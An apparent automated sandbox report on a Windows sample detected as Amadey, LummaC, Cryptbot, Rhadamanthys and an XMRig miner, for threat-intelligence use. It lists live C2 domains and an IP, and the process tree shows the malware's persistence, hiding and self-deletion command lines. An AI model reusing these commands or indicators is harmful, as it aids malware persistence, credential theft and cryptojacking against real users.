Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1577450
MD5:	157e44350b06a516680ed7b7584c5e31
SHA1:	fc08a1bccbef19fc0c60be65c939ecd344c28d96
SHA256:	09bae49e2d08d3316490b621a37fa44ec46eb894133664fffb2b6202e7364c94
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected RHADAMANTHYS Stealer

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Drops password protected ZIP file

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found strings related to Crypto-Mining

Hides threads from debuggers

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3832 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 157E44350B06A516680ED7B7584C5E31)

skotes.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 157E44350B06A516680ED7B7584C5E31)

skotes.exe (PID: 4428 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 157E44350B06A516680ED7B7584C5E31)

skotes.exe (PID: 5480 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 157E44350B06A516680ED7B7584C5E31)

4ec75545d6.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe" MD5: DC132B79455BC816EDE67EDFF521215C)

svchost.exe (PID: 1008 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

WerFault.exe (PID: 4428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)

3a1a782de7.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)

conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3a1a782de7.exe (PID: 6704 cmdline: "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)

44cc35716d.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

44cc35716d.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

bc8eaffed4.exe (PID: 4412 cmdline: "C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe" MD5: A326CDB677DE0DFFBC5BEB2970B80AC0)

chrome.exe (PID: 6976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,16473332069904579235,14265532122417200322,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

c46817b905.exe (PID: 5736 cmdline: "C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 4024 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 4476 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6840 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6372 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6644 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 5780 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1364 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4064 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4668 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

attrib.exe (PID: 7060 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

in.exe (PID: 1444 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)

attrib.exe (PID: 7068 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 3608 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4312 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4040 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 5040 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

Intel_PTT_EK_Recertification.exe (PID: 5168 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)

explorer.exe (PID: 5908 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

powershell.exe (PID: 3996 cmdline: MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6452 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 6780 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Intel_PTT_EK_Recertification.exe (PID: 6984 cmdline: MD5: 83D75087C9BF6E4F07C36E550731CCDE)

explorer.exe (PID: 6304 cmdline: MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "pancakedipyps.click", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat"], "Build id": "FATE99--test"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000031.00000002.2999450325.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000003.1721363531.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1483791860.0000000004A40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2064174110.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000035.00000002.3593333371.0000000001148000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000035.00000002.3593333371.0000000001129000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000031.00000002.3000778509.000000014040B000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.1732609281.0000000003200000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000003.00000003.1485484180.0000000004630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000003.1721407127.0000000004E30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000035.00000002.3594232724.000000014040B000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000007.00000003.1716803136.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000003.2065590951.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2064564073.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000031.00000002.2999450325.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000003.2064724711.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1455149743.0000000004820000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
00000035.00000002.3594079796.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000004.00000003.1570343536.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000031.00000002.2999450325.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000031.00000002.3000666854.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
Process Memory Space: 4ec75545d6.exe PID: 4568	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 1008	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: 3a1a782de7.exe PID: 6704	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 3a1a782de7.exe PID: 6704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3a1a782de7.exe PID: 6704	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 5168	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 5908	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.3.svchost.exe.5300000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
2.2.skotes.exe.900000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.3.4ec75545d6.exe.5550000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.3.4ec75545d6.exe.5330000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x324cc8:$x1: donate.ssl.xmrig.com
44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x325978:$s1: %s/%s (Windows NT %lu.%lu 0x329580:$s3: \\.\WinRing0_ 0x2e3130:$s4: pool_wallet 0x2dd978:$s5: cryptonight 0x2dd988:$s5: cryptonight 0x2dd998:$s5: cryptonight 0x2dd9a8:$s5: cryptonight 0x2dd9c0:$s5: cryptonight 0x2dd9d0:$s5: cryptonight 0x2dd9e0:$s5: cryptonight 0x2dd9f8:$s5: cryptonight 0x2dda08:$s5: cryptonight 0x2dda20:$s5: cryptonight 0x2dda38:$s5: cryptonight 0x2dda48:$s5: cryptonight 0x2dda58:$s5: cryptonight 0x2dda68:$s5: cryptonight 0x2dda80:$s5: cryptonight 0x2dda98:$s5: cryptonight 0x2ddaa8:$s5: cryptonight 0x2ddab8:$s5: cryptonight
8.3.svchost.exe.50e0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
0.2.file.exe.9d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
53.2.explorer.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
53.2.explorer.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
